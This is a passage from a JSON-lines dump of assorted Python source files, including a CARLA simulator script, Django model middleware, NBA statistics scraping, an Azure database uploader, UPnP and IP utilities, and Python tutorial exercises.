ignore traffic light, do not keep safe distance, and very fast\n traffic_manager.ignore_lights_percentage(danger_car, 100)\n traffic_manager.distance_to_leading_vehicle(danger_car, 0)\n traffic_manager.vehicle_percentage_speed_difference(danger_car, -100)\n\n print('spawned %d vehicles , press Ctrl+C to exit.' % (len(vehicles_list)))\n\n # create ego vehicle\n ego_vehicle_bp = world.get_blueprint_library().filter('model3')[0]\n # green color\n ego_vehicle_bp.set_attribute('color', '0, 0, 0')\n # set this one as ego\n ego_vehicle_bp.set_attribute('role_name', 'hero')\n # get a valid transform that has not been assigned yet\n transform = spawn_points[len(vehicles_id_list)]\n\n ego_vehicle = world.spawn_actor(ego_vehicle_bp, transform)\n ego_vehicle.set_autopilot(True)\n vehicles_id_list.append(ego_vehicle.id)\n\n # create sensor queue\n sensor_queue = Queue(maxsize=10)\n\n # add a camera\n camera_bp = world.get_blueprint_library().find('sensor.camera.rgb')\n camera_bp.set_attribute('image_size_x', str(1920))\n camera_bp.set_attribute('image_size_y', str(1080))\n camera_bp.set_attribute('fov', '60')\n camera_bp.set_attribute('sensor_tick', str(0.04))\n # camera relative position related to the vehicle\n\n # Manually selected camera location\n camera_transform = carla.Transform(carla.Location(-82.615005, -138.925934, 12.720448), carla.Rotation(-14.151550, 89.400490, -0.000276))\n camera = world.spawn_actor(camera_bp, camera_transform)\n # set the callback function\n camera.listen(lambda image_data: sensor_callback(image_data, sensor_queue, \"camera\",world))\n sensor_list.append(camera)\n\n # # we also add a radar on it\n # rad_bp = world.get_blueprint_library().find('sensor.other.radar')\n # rad_bp.set_attribute('horizontal_fov', str(30))\n # rad_bp.set_attribute('vertical_fov', str(30))\n # rad_bp.set_attribute('range', str(76))\n # rad_bp.set_attribute('sensor_tick', str(0.04)) \n # rad_bp.set_attribute('points_per_second', str(500))\n # # set the relative location\n # radar_location = carla.Location(0, 0, 2)\n # radar_rotation = carla.Rotation(0, 0, 0)\n # radar_transform = carla.Transform(radar_location, radar_rotation)\n # # spawn the radar\n # radar = world.spawn_actor(rad_bp, transform)\n # radar.listen(\n # lambda radar_data: sensor_callback(radar_data, sensor_queue, \"radar\", world))\n # sensor_list.append(radar)\n\n while True:\n if args.sync and synchronous_master:\n world.tick()\n # set the sectator to follow the ego vehicle\n spectator = world.get_spectator()\n # transform = ego_vehicle.get_transform()\n spectator.set_transform(transform)\n try:\n for i in range(0, len(sensor_list)):\n s_frame = sensor_queue.get(True, 1.0)\n print(\" Frame: %d Sensor: %s\" % (s_frame[0], s_frame[1]))\n except Empty:\n print(\" Some of the sensor information is missed\")\n else:\n world.wait_for_tick()\n\n finally:\n world.apply_settings(origin_settings)\n print('\\ndestroying %d vehicles' % len(vehicles_id_list))\n\n client.apply_batch([carla.command.DestroyActor(x) for x in vehicles_id_list])\n for sensor in sensor_list:\n sensor.destroy()\n print('done.')\n\n\nif __name__ == '__main__':\n\n try:\n main()\n except KeyboardInterrupt:\n print(' - Exited by user.')\n","sub_path":"test_rgb.py","file_name":"test_rgb.py","file_ext":"py","file_size_in_byte":12338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279316603","text":"# -*- coding: utf-8 -*-\nfrom django.db.models.base import ModelBase\nfrom django.db import models\nimport types\n\ndef _filter_bases(bases, filter_key): \n \"\"\" Remove all classes descendants of ``filter_key`` from ``bases`` \"\"\"\n new_bases = tuple([base for base in bases \\\n if ((not (base is filter_key)) and (not issubclass(base, filter_key)))])\n \n # ensure that we don't end up with an orphan class - it must be\n # parented by at least models.Model\n if len(new_bases) == 0: new_bases = (models.Model,)\n return new_bases\n\nclass Hooks(object):\n _pre_saves = {}\n _post_saves = {}\n _pre_deletes = {}\n _post_deletes = {}\n\nclass MetaModelMiddleware(ModelBase):\n \n # pre and post hooks for save() will be temporarily stored in these\n #pre_saves = {}\n #post_saves = {}\n # pre and post hooks for delete()\n #pre_deletes = {}\n #post_deletes = {}\n def __new__(cls, name, bases, attrs):\n \n # whether base classes should be filtered\n cls.hide_bases = False\n # only filter bases if this wasn't invoked by the ModelMiddleware\n # class, which is a super class for all custom middleware, and the\n # one we are using as a filter key\n if not (name == 'ModelMiddleware'):\n if not (ModelMiddleware in bases):\n cls.hide_bases = True\n if cls.hide_bases:\n # replace the original bases with filtered ones to fool Django's inheritance\n bases = _filter_bases(bases, ModelMiddleware)\n # set the middleware options under Klass._middle\n if attrs.has_key('Middle'):\n midopts = attrs['Middle']\n assert type(midopts) == types.ClassType, \"Middle attribute of %s model must be a class, not a %s object\" % (name, type(midopts))\n opts = {}\n opts.update([(k,v) for k,v in midopts.__dict__.items() if not k.startswith('_')])\n attrs[\"_middle\"] = opts\n attrs.pop('Middle')\n return ModelBase.__new__(cls, name, bases, attrs)\n \n def __init__(cls,name,bases,attrs):\n # provide a wrapper func for save()\n def new_save(func):\n def wrapper(*args, **kwargs):\n if hasattr(cls, 'pre_saves'):\n [pre(args[0]) for pre in cls.pre_saves]\n func(*args, **kwargs)\n if hasattr(cls, 'post_saves'):\n [post(args[0]) for post in cls.post_saves]\n return wrapper\n # provide a wrapper func for delete()\n def new_delete(func):\n def wrapper(*args, **kwargs):\n if hasattr(cls, 'pre_deletes'):\n [pre(args[0]) for pre in cls.pre_deletes]\n func(*args, **kwargs)\n if hasattr(cls, 'post_deletes') > 0:\n [post(args[0]) for post in cls.post_deletes]\n return wrapper\n \n # if this is a descendant of ModelMiddleware, but not ModelMiddleware itself\n if name != 'ModelMiddleware':\n # if this class inherits directly from ModelMiddleware then save its hooks\n if ModelMiddleware in bases:\n if attrs.has_key('pre_save'):\n Hooks._pre_saves[name] = attrs['pre_save']\n if attrs.has_key('post_save'):\n Hooks._post_saves[name] = attrs['post_save']\n if attrs.has_key('pre_delete'):\n Hooks._pre_deletes[name] = attrs['pre_delete']\n if attrs.has_key('post_delete'):\n Hooks._post_deletes[name] = attrs['post_delete']\n \n\n # if this is NOT a direct descendant of ModelMiddleware - not a holder of callbacks\n if ModelMiddleware not in bases:\n orig_save = cls.save\n orig_delete = cls.delete\n for base in bases:\n base_pre_save = Hooks._pre_saves.get(base.__name__, False)\n if base_pre_save:\n if not hasattr(cls,'pre_saves'):\n cls.pre_saves = []\n cls.pre_saves.append(base_pre_save)\n base_post_save = Hooks._post_saves.get(base.__name__, False)\n if base_post_save:\n if not hasattr(cls, 'post_saves'):\n cls.post_saves = []\n cls.post_saves.append(base_post_saves)\n base_pre_delete = Hooks._pre_deletes.get(base.__name__, False)\n if base_pre_delete:\n if not hasattr(cls, 'pre_deletes'):\n cls.pre_deletes = []\n cls.pre_deletes.append(base_pre_deletes)\n base_post_delete = Hooks._post_deletes.get(base.__name__, False)\n if base_post_delete:\n if not hasattr(cls, 'post_deletes'):\n cls.post_deletes = []\n cls.post_deletes.append(base_post_deletes)\n cls.save = new_save(orig_save)\n cls.delete = new_delete(orig_delete)\n # replace original bases with filtered ones\n bases = _filter_bases(bases,ModelMiddleware)\n new_class = super(ModelBase,cls).__init__(name,bases,attrs)\n return new_class\n \n\nclass ModelMiddleware(models.Model):\n \"\"\"\n Custom model middleware components should subclass this and never\n use the MetaModelMiddleware metaclass directly.\n \"\"\"\n __metaclass__ = MetaModelMiddleware\n \n \nclass ReSTMiddleware(ModelMiddleware):\n def pre_save(self):\n try:\n opts = self.__class__._middle[\"ReST\"] # individual options are saved in a dict\n except (AttributeError, KeyError):\n return # just fail silently, though it might not be a very good idea in practice\n\n # parse for as many fields as we have options for\n for opt in opts: \n # lets be nice to ourselves and provide a default value for the initial header level\n if not opt.has_key(\"init_header\"):\n opt[\"init_header\"] = 1 \n try:\n cont = getattr(self, opt[\"field\"]).decode(\"utf_8\")\n parts = build_document(cont, initial_header_level=opt[\"init_header\"])\n setattr(self, opt[\"save_body\"], parts[\"html_body\"].encode('utf_8'))\n setattr(self, opt[\"save_toc\"], parts[\"toc\"].encode('utf_8'))\n except:\n pass # another silent fail, needs fixing d = datetime.now()\n\nfrom datetime import datetime\n\nclass TimestampMiddleware(ModelMiddleware):\n \"\"\"\n This class can record a timestamp (down to one second precision) into any fields you specify.\n There are two types of timestamps: 'always' and 'once'. 'always' means that record must be\n made on every save(), while 'once' fields will be timestamped once on the first save() of this\n object.\n \n A default set of options (used if none are provided by the model) is provided, which presume\n the existance of 'pub_date' and 'last_modified' fields. The 'pub_date' field is of type \"once\",\n and 'last_modified' is of type \"always\". This lets you timestamp the object's creation and modification\n times.\n \n Example options (also the default ones):\n \n class Middle:\n Timestamp = ({'field' : 'pub_date', 'type' : 'once'},\n {'field' : 'last_modified', 'type' : 'always'})\n \"\"\"\n def pre_save(self):\n try:\n opts = self.__class__._middle[\"Timestamp\"]\n except (AttributeError, KeyError):\n opts = ({'field' : 'pub_date', 'type' : 'once'},\n {'field' : 'last_modified', 'type' : 'always'})\n \n for opt in opts:\n if not opt.has_key('type'):\n opt['type'] = 'always'\n d = datetime.now()\n pdate = datetime(d.year, d.month, d.day, d.hour, d.minute)\n # if this is a \"set once\" type of field, then we check whether\n # it's been filled in and if not - do so\n if opt['type'] == 'once':\n if getattr(self, opt['field']) is None:\n setattr(self, opt['field'], pdate)\n elif opt['type'] == 'always':\n setattr(self, opt['field'], pdate)\n","sub_path":"westom/feednut/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"382803504","text":"'''\nAuthor: Eunice Jun (@emjun)\nDate created: November, 4, 2019 \nPurpose: Transform a wide format dataset into long format\nUse: python3 longify.py \n'''\nimport sys\nimport csv\nimport pandas as pd \n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2: \n print(\"Misusing script. Must include EXACTLY ONE parameter: python3 longify.py \")\n elif not sys.argv[1].endswith('.csv'): \n print(\"Data file must be a CSV file!\")\n else:\n wide_csv = sys.argv[1]\n wide_df = pd.read_csv(wide_csv)\n # long_df = pd.wide_to_long(wide_df, stubnames='Score', i=None, j='ID')\n cols_to_collapse = ['AR', 'TV']\n result_col = 'Score'\n \n import pdb; pdb.set_trace()\n long_df.to_csv()\n\n\n","sub_path":"examples/longify.py","file_name":"longify.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328350475","text":"import ctypes\nimport hashlib\nimport json\nimport os\nimport socket\nimport urllib.request\n\nfrom colorama import Fore, Style, init\n\nimport miniupnpc\n\ninit()\n\n\nclass utils:\n @staticmethod\n def load_config():\n with open(\"config.json\", \"r\") as read_file:\n return json.load(read_file)\n\n @staticmethod\n def hash_file(file_name):\n sha1 = hashlib.sha1()\n f = open(file_name, 'rb')\n while 1:\n data = f.read(65536)\n if not data:\n break\n sha1.update(data)\n return sha1.hexdigest()\n\n @staticmethod\n def get_internal_ip():\n return (([\n ip for ip in socket.gethostbyname_ex(socket.gethostname())[2]\n if not ip.startswith(\"127.\")\n ] or [[(s.connect((\"8.8.8.8\", 53)), s.getsockname()[0], s.close())\n for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]\n ][0][1]]) + [\"no IP found\"])[0]\n\n @staticmethod\n def get_external_ip():\n return urllib.request.urlopen('https://ident.me').read().decode('utf8')\n\n @staticmethod\n def progress_bar(iteration,\n total,\n prefix='',\n suffix='',\n decimals=1,\n length=100,\n fill='█',\n speed=0.0):\n prefix = 'Receiving:'\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(\n 100 * (iteration / float(total)))\n filled_length = int(length * iteration // total)\n bar = Style.BRIGHT + Fore.GREEN + fill * filled_length + \\\n Fore.RED + '-' * (length - filled_length) + Style.RESET_ALL\n print('\\r%s |%s| %s%% %s %s ' %\n (prefix, bar, percent, suffix, round(speed, 1)) + Style.BRIGHT\n + Fore.CYAN + 'MB/S' + Style.RESET_ALL,\n end='\\r')\n\n @staticmethod\n def upnp_open(port):\n port = int(port)\n upnp = miniupnpc.UPnP()\n upnp.discoverdelay = 10\n upnp.discover()\n upnp.selectigd()\n upnp.addportmapping(port, 'TCP', upnp.lanaddr, port, 'RadolynTCP', '')\n\n @staticmethod\n def upnp_close(port):\n port = int(port)\n upnp = miniupnpc.UPnP()\n upnp.discoverdelay = 10\n upnp.discover()\n upnp.selectigd()\n upnp.deleteportmapping(port, 'TCP')\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532542185","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 8 13:46:01 2015\n\n@author: weinfz18\n\"\"\"\n\nimport os\nimport numpy as np\nimport csv\nimport lxml.html\nfrom lxml import etree\ndef astext(elem):\n \"Return stripped text value of element\"\n return etree.tostring(elem, method='text').strip()\nyears = ['2012','2013','2014','2015']\ndata = {}\npo = 0\nfor year in years:\n site = 'http://www.basketball-reference.com/leagues/NBA_' + year +'_totals.html'\n page = lxml.html.parse(site)\n rows = page.xpath('//tr')\n stuff = [row.xpath('*//text()') for row in rows]\n stuff = [[str(s) for s in t] for t in stuff]\n for i in range(len(stuff)):\n if len(stuff[i])!=30:\n if stuff[i][8]=='0' and stuff[i][9]=='0':\n stuff[i] = stuff[i][:10] + [''] + stuff[i][10:]\n if len(stuff[i])!=30:\n if stuff[i][11]=='0' and stuff[i][12]=='0':\n stuff[i] = stuff[i][:13] + [''] + stuff[i][13:]\n if len(stuff[i])!=30:\n if stuff[i][14]=='0' and stuff[i][15]=='0':\n stuff[i] = stuff[i][:16] + [''] + stuff[i][16:]\n if len(stuff[i])!=30:\n if stuff[i][8]=='0' and stuff[i][9]=='0':\n stuff[i] = stuff[i][:17] + [''] + stuff[i][17:]\n if len(stuff[i])!=30:\n if stuff[i][18]=='0' and stuff[i][19]=='0':\n stuff[i] = stuff[i][:20] + [''] + stuff[i][20:]\n if len(stuff[i])!=30:\n po+=1\n #etree.tostring(elem, method='text').strip()\n #row.xpath('./*/text()')\n data[year] = stuff\n\n \n#%%\nimport string\ndef get_data(filename):\n '''function to read the data form the input csv file to use in the analysis'''\n with open(filename, 'r') as f:\n reader = csv.reader(f,delimiter=',') \n #returns all the data from the csv file in list form\\\n return list(reader)\n \npunct = set(string.punctuation)\nos.chdir(\"C:\\\\Users\\\\weinfz18\\\\Documents\\\\nba\\\\model\")\n\nplayers = get_data('o3take.csv')\nplayers = [x[1] for x in players]\nstats = [None]*len(players)\nfor i in range(len(players)):\n players[i] = 'Luc Mbah a Moute' if players[i]=='Luc Moute' else players[i]\n players[i] = 'Danny Green' if players[i]=='Daniel Green' else players[i]\n players[i] = 'Ish Smith' if players[i]=='Ishmael Smith' else players[i]\n players[i] = 'Jose Barea' if players[i]=='J.J. Barea' else players[i]\n players[i] = 'Louis Williams' if players[i]=='Lou Williams' else players[i]\n players[i] = 'Maurice Harkless' if players[i]=='Moe Harkless' else players[i]\n players[i] = 'Patrick Mills' if players[i]=='Patty Mills' else players[i]\n for year in years:\n for j in range(len(data[year])):\n if ''.join(x for x in (str(players[i]).lower()) if x not in punct) in ''.join(x for x in (str(data[year][j][1]).lower()) if x not in punct):\n stats[i]=[data[year][j]]\n continue\nmissing = [players[x] for x in range(len(players)) if stats[x] is None] \nstats = [stats[x][0] for x in range(len(stats)-2)] \nstats = np.array(stats) \n#%%\ngames = stats[:,5].astype(np.float)\nthrees = stats[:,11:13].astype(np.float)\nthree_percent = threes[:,0]/threes[:,1]\nthree_percent = np.nan_to_num(three_percent)\na_3s_per_game = threes[:,1]/games\nbayes = ((a_3s_per_game)*(three_percent)+((4/5)*22*.351))/(a_3s_per_game+(4/5)*22)\nbayes = np.nan_to_num(bayes)\nintercept = np.log(.351/(1-.351))\nbayes = np.log(bayes/(1-bayes))\nbayes = bayes - intercept\nplayers = np.array(players[:-2])\nbayes = np.vstack((players,bayes))\nbayes = np.transpose(bayes)\nos.chdir(\"C:\\\\Users\\\\weinfz18\\\\Documents\\\\nba\")\nnp.savetxt(\"o3make_priors.csv\",bayes,delimiter=\",\",fmt=\"%s\") \n#stats = np.array(stats[:-2]) \n#%% \ngames = stats[:,5].astype(np.float)\nthrees = stats[:,11:13].astype(np.float)\nfgs = stats[:,8:10].astype(np.float)\nthree_percent_takes = threes[:,1]/fgs[:,1]\nthree_percent_takes = np.nan_to_num(three_percent_takes)\na_fgs_per_game = fgs[:,1]/games\navg_percent = 22/83\nbayes = ((a_fgs_per_game)*(three_percent_takes)+((4/5)*83*avg_percent))/(a_fgs_per_game+(4/5)*83)\nbayes = np.nan_to_num(bayes)\nintercept = np.log(avg_percent/(1-avg_percent))\nbayes = np.log(bayes/(1-bayes))\nbayes = bayes - intercept\nplayers = np.array(players[:-2])\nbayes = np.vstack((players,bayes))\nbayes = np.transpose(bayes)\nos.chdir(\"C:\\\\Users\\\\weinfz18\\\\Documents\\\\nba\")\nnp.savetxt(\"o3take_priors.csv\",bayes,delimiter=\",\",fmt=\"%s\") \n#%%","sub_path":"get_priors.py","file_name":"get_priors.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532611433","text":"from src.asserts import assert_equal, assert_is\nfrom src.otter import Otter, Status\nfrom src.unittest import UnitTest, TestCase\nfrom test.test_classes import test_class\n\n\nclass ExecuteTestSuccessTest(UnitTest):\n def set_up(self):\n self.otter = Otter([])\n self.test_object = test_class()\n self.otter.set_test_list(\n [self.test_object]\n )\n self.otter.get_test_list()[0].set_up()\n self.unit = self.otter.get_test_list()[0]\n self.case = {\n \"func\": test_class.test_case_one,\n \"name\": \"test_case_one\"\n }\n self.otter.execute_test(self.unit, self.case)\n self.result = self.otter.get_results()[0]\n\n def tear_down(self):\n self.otter = None\n\n @TestCase\n def test_execute_test_status(self):\n assert_equal(\n self.result[\"status\"],\n Status.OK,\n message=\"Status was not OK.\"\n )\n\n @TestCase\n def test_execute_test_message(self):\n assert_equal(\n self.result[\"message\"],\n \"\"\n )\n\n @TestCase\n def test_execute_test_unit(self):\n assert_is(\n self.result[\"unit\"],\n self.unit\n )\n\n @TestCase\n def test_execute_test_case(self):\n assert_is(\n self.result[\"case\"],\n self.case[\"name\"]\n )\n","sub_path":"test/execute_test_success_test.py","file_name":"execute_test_success_test.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"47279174","text":"# Ask the user for a number.\n# Depending on whether the number is even or odd,\n# print out an appropriate message to the user\n\nx = 221 # this is even\n\nresult = x % 2\nif (result == 0): # this is even\n print('even')\nelse: # this is odd\n print('odd')\n","sub_path":"Superprof/some_basics/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"219302973","text":"#1.print numbers from 7-19\nprint (\"Numbers from 7-19\")\ni=7\nwhile (i<=19):\n print (i)\n i += 1\nprint (\"\") \n \n \n \n \n \n#2.print even numbers between 12-20\nprint (\"Even Numbers Between 12 and 20\")\na=13\nwhile a<20:\n if a%2!=0:\n a += 1\n else:\n print(a)\n a += 1\nprint (\"\")\n \n \n \n \n\n#3.function that takes two numbers and prints even numers between them\nprint (\"Determine Even Numbers in the Inputs\")\ndef even():\n a = int(input(\"Enter number 1: \"))\n b = int(input(\"Enter number 2: \"))\n while a!=0 and b!=0:\n \n while a%2==0 and b%2!=0:\n return print (\"'\",a,\"' \"\"is an even number\" \" '\",b,\"' \" \"is not\")\n \n while a%2!=0 and b%2==0:\n return print (\"'\",b,\"' \"\"is an even number\"\" '\",a,\"' \"\"is not\")\n \n while a%2==0 and b%2==0:\n return print (\"'\",a,\"' \"\"and\"\" '\",b,\"' \"\"are even numbers\")\n print (\"Zero is not accepted\")\n a = int(input(\"Enter number 1: \"))\n b = int(input(\"Enter number 2: \")) \nprint (even()) \n\n ","sub_path":"while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171602670","text":"from neural_nets import squeezedet as nn\nfrom modify_primitives.utils import *\nfrom modify_primitives.heatmap import *\nfrom ml_primitives.sampling_primitives import *\nfrom populateLibrary import *\nimport glob\n \ncars = glob.glob(\"pics/cars/*.png\")\nroads = glob.glob(\"pics/roads/*.jpg\")\n\nconf = nn.init()\n\n\nDIM = 2\nout = 'pics/out/'\n\nLib = populateLibrary()\n\nsamples = halton_sampling(2, 1)\n\nfor road in roads[:1]:\n out_pic_name = out + \"tmp.png\"\n im = Image.open(road)\n\n for sample in samples[:1]:\n loc = generatePicture(Lib, [sample[0], sample[1], 1, 1, 1, 1], \"tmp.png\", i-130, 3)\n confidence = nn.classify(out_pic_name, conf)\n print(confidence)\n if not confidence:\n score = 0\n else:\n try:\n if confidence[0][0][0] == 0:\n score = int(confidence[0][0][1]*100)\n else:\n score = 0\n except IndexError:\n break\n print(score)\n col = rgb(0,100,score)\n im = draw_circle(im, loc[0], loc[1], 5, col)\n w.writerow(sample+[score])\n\n im.save(OUT_PIC_PATH + pic_name)\n f.close()\n","sub_path":"picture_generator.py","file_name":"picture_generator.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"557703072","text":"import copy\nimport emoji\nimport datetime\nimport dbstream\nimport pyodbc\nimport os\n\nimport re\nimport requests\n\nfrom pyzure.core.Column import create_columns, change_column_type\nfrom pyzure.core.Table import create_table\nfrom pyzure.core.tools.print_colors import C\nfrom pyzure.core.tools.progress_bar import print_progress_bar\n\n\ndef extract_emojis(str_):\n return ''.join(c for c in str_ if c in emoji.UNICODE_EMOJI or c in ('🏻', '🇺', '🇸', '🇬', '🇧'))\n\n\ndef replace_all_emoji(str_):\n for i in extract_emojis(str_):\n str_ = str_.replace(i, '???')\n return str_\n\n\nclass AzureDBStream(dbstream.DBStream):\n def __init__(self, instance_name, client_id):\n super().__init__(instance_name, client_id=client_id)\n self.instance_type_prefix = \"AZURE\"\n self.ssh_init_port = 6544\n\n def credentials(self):\n creds = super().credentials()\n alias = self.instance_type_prefix + \"_\" + self.instance_name\n if os.environ.get(alias + \"_DRIVER_PATH\"):\n driver = os.environ.get(alias + \"_DRIVER_PATH\")\n else:\n driver = os.environ.get(alias + \"_DRIVER\")\n creds.update({\n \"uid\": creds[\"user\"],\n \"server\": creds[\"host\"],\n \"driver\": driver,\n \"TDS_Version\": \"7.2\"\n })\n return creds\n\n def _execute_query_custom(self, query, data=None):\n connection_kwargs = self.credentials()\n con = pyodbc.connect(**connection_kwargs)\n cursor = con.cursor()\n try:\n if data:\n cursor.execute(query, data)\n else:\n cursor.execute(query)\n except Exception as e:\n cursor.close()\n con.close()\n raise e\n result = []\n try:\n columns = [column[0] for column in cursor.description]\n\n for row in cursor.fetchall():\n dict_ = dict()\n for i in range(len(columns)):\n dict_[columns[i]] = row[i]\n result.append(dict_)\n except (pyodbc.ProgrammingError, TypeError):\n pass\n con.commit()\n cursor.close()\n con.close()\n query_create_table = re.search(\"(?i)(?<=((into ))).*(?=\\n)\", query)\n if result:\n return [dict(r) for r in result]\n elif query_create_table:\n return {'execute_query': query_create_table}\n else:\n return None\n\n def _send(\n self,\n data,\n replace,\n batch_size=1000,\n sub_commit=True):\n # Time initialization\n start = datetime.datetime.now()\n\n # Extract info\n rows = data[\"rows\"]\n if not rows:\n return 0\n table_name = data[\"table_name\"]\n columns_name = data[\"columns_name\"]\n total_len_data = len(rows)\n\n # Clean table if needed\n if replace:\n cleaning_query = '''DELETE FROM ''' + table_name + ''';'''\n self.execute_query(cleaning_query)\n print(C.OKBLUE + \"Cleaning Done\" + C.ENDC)\n\n connection_kwargs = self.credentials()\n con = pyodbc.connect(**connection_kwargs)\n cursor = con.cursor()\n\n small_batch_size = int(2099 / len(columns_name))\n\n print(\"Initiate send_to_azure...\")\n\n # Initialize counters\n boolean = True\n question_mark_pattern = \"(%s)\" % \",\".join([\"?\" for i in range(len(rows[0]))])\n counter = 0\n while boolean:\n temp_row = []\n question_mark_list = []\n for i in range(small_batch_size):\n if rows:\n value_list = rows.pop()\n for i in range(len(value_list)):\n if isinstance(value_list[i], str):\n value_list[i] = replace_all_emoji(value_list[i])\n temp_row.append(value_list)\n question_mark_list.append(question_mark_pattern)\n else:\n boolean = False\n continue\n counter = counter + len(temp_row)\n # percent = round(float(counter * 100) / total_len_data)\n if sub_commit:\n suffix = \"%% rows sent\"\n print_progress_bar(counter, total_len_data, suffix=suffix)\n else:\n suffix = \"% rows prepared to be sent\"\n print_progress_bar(counter, total_len_data, suffix=suffix)\n data_values_str = ','.join(question_mark_list)\n columns_name_str = \"\\\",\\\"\".join(columns_name)\n inserting_request = '''INSERT INTO %s (\"%s\") VALUES %s ;''' % (\n table_name, columns_name_str, data_values_str)\n\n final_data = [y for x in temp_row for y in x]\n if final_data:\n try:\n cursor.execute(inserting_request, final_data)\n except Exception as e:\n cursor.close()\n con.close()\n raise e\n\n if sub_commit:\n con.commit()\n if not sub_commit:\n con.commit()\n cursor.close()\n con.close()\n\n print(\"data sent to azure\")\n print(\"Total rows: %s\" % str(total_len_data))\n print(C.BOLD + \"Total time in seconds : %s\" % str((datetime.datetime.now() - start).seconds) + C.ENDC)\n return 0\n\n def _send_data_custom(self,\n data,\n replace=True,\n batch_size=1000,\n other_table_to_update=None,\n sub_commit=True\n ):\n data_copy = copy.deepcopy(data)\n try:\n self._send(data, replace=replace, sub_commit=sub_commit)\n except Exception as e:\n print(e)\n if \"invalid object name\" in str(e).lower():\n create_table(\n self,\n data_copy\n )\n elif \"invalid column name\" in str(e).lower():\n create_columns(self, data_copy, other_table_to_update)\n elif \"string or binary data would be truncated\" in str(e).lower():\n change_column_type(self, data_copy, other_table_to_update)\n elif \"The conversion of the nvarchar value\" in str(e) and \"overflowed an int column\" in str(e):\n change_column_type(self, data_copy, other_table_to_update)\n elif \"Use a larger integer column\" in str(e):\n change_column_type(self, data_copy, other_table_to_update)\n elif \"Conversion failed when converting the nvarchar value\" in str(e):\n change_column_type(self, data_copy, other_table_to_update)\n else:\n raise e\n self._send_data_custom(data_copy, replace=replace, batch_size=batch_size,\n other_table_to_update=other_table_to_update, sub_commit=sub_commit)\n","sub_path":"pyzure/AzureDBStream.py","file_name":"AzureDBStream.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291392930","text":"# Python Tutorial\n# https://docs.python.org/3/tutorial/index.html\n\n\n# Stuff I need to work on\n# List comprehensions / nested list comprehensions\n# Generator expressions\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 1: Whetting Appetite\n# has no code\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 2: Using Interpreter\nthe_world_is_flat = True\nif the_world_is_flat:\n print(\"Be careful not to fall off!\") # prints\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 3: Informal Intro\n# this is the first comment\nspam = 1 # and this is the second comment\n # ... and now a third!\ntext = \"# This is not a comment because it's inside quotes.\"\nwidth = 20\nheight = 5 * 9\nprint(width * height) # 900, remains int\nprint(4 * 3.75 - 1) # 14.0, converts to float\nprint('C:\\some\\name') # here \\n means newline!\nprint(r'C:\\some\\name') # note the r before the quote\nprint(\"\"\"\\\nUsage: thingy [OPTIONS]\n -h Display this usage message\n -H hostname Hostname to connect to\n\"\"\") # \"\"\" to span multiple lines\nprint(3 * 'un' + 'ium') # unununium\nword = 'Python'\nprint(word[0]) # character in position 0, 'P'\nprint(word[5]) # character in position 5, 'n'\nprint(word[-2]) # second-last character\nprint(word[:2] + word[2:]) # combines to 'Python', s[:i] + s[i:] is always equal to s\nprint(word[4:42]) # knows where it ends; 'on'\nprint('J' + word[1:]) # 'Jython'\ns = 'supercalifragilisticexpialidocious'\nprint(len(s)) # 34\nsquares = [1, 4, 9, 16, 25]\nprint(squares[-3:])\nprint(squares + [36, 49, 64, 81, 100])\ncubes = [1, 8, 27, 65, 125] # something's wrong here\ncubes[3] = 64 # replace the wrong value\nprint(cubes) # [1, 8, 27, 64, 125]\ncubes.append(216) # add the cube of 6\ncubes.append(7 ** 3) # and the cube of 7\nprint(cubes) # [1, 8, 27, 64, 125, 216, 343]\nletters = ['a', 'b', 'c', 'd', 'e', 'f', 'g']\nletters[2:5] = ['C', 'D', 'E']\nprint(letters) # ['a', 'b', 'C', 'D', 'E', 'f', 'g']\nletters[2:5] = []\nprint(letters) # ['a', 'b', 'f', 'g']\nprint(len(letters)) # 4\nletters[:] = []\nprint(letters) # []\na = ['a', 'b', 'c']\nn = [1, 2, 3]\nx = [a, n]\nprint(x) # [['a', 'b', 'c'], [1, 2, 3]]\nprint(x[0]) # ['a', 'b', 'c']\nprint(x[0][1]) # 'b'\na, b = 0, 1\nwhile a < 10: # print fibonacci from 0 to 10\n print(a, end = \", \")\n a, b = b, a+b\nprint()\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 4: Flow Control and Functions\nx = int(input(\"Please enter an integer: \"))\nif x < 0:\n x = 0\n print('Negative changed to zero')\nelif x == 0:\n print('Zero')\nelif x == 1:\n print('Single')\nelse:\n print('More')\nwords = ['cat', 'window', 'defenestrate']\nfor w in words:\n print(w, len(w))\nfor i in range(5):\n print(i)\nprint(range(5, 10)) # 5, 6, 7, 8, 9\nprint(range(0, 10, 3)) # 0, 3, 6, 9\nprint(range(-10, -100, -30)) # -10, -40, -70\na = ['Mary', 'had', 'a', 'little', 